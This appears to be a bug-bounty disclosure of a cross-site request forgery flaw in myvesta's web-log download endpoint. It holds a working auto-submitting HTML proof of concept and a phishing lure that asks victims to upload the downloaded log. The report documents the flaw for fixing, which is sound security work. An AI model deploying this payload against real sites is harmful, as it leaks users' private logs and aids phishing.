Cross-Site Request Forgery (CSRF) in myvesta/vestaValid
Aug 24th 2021
download/web-log endpoint does not have CSRF Protection. This could be used to force download
access log and potentially sensitive information leakage.
🕵️♂️ Proof of Concept
Login to user account. Create the following POC.html file and open the page in browser.
<html> <body> <h2>To verify that you are a human, upload the file that has been downloaded from our website now.</h2> <body> <script>history.pushState('', '', '/')</script> <form action="https://demo.myvesta.com/download/web-log/"> <input type="hidden" name="domain" value="demo.myvesta.com" /> <input type="hidden" name="type" value="access" /> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
POC.html downloads user's data from the application without user's permission. An attacker can then cheat the user to upload this file into an attacker controlled server.
Potential private information leakage through phishing by exploiting missing CSRF token.
Tested on Edge, Firefox, chrome and safari.
You should set a CSRF token on such GET requests. 📍 Location index.php#L1 📝 References csrf 📍 Location index.php#L1 📝 References csrf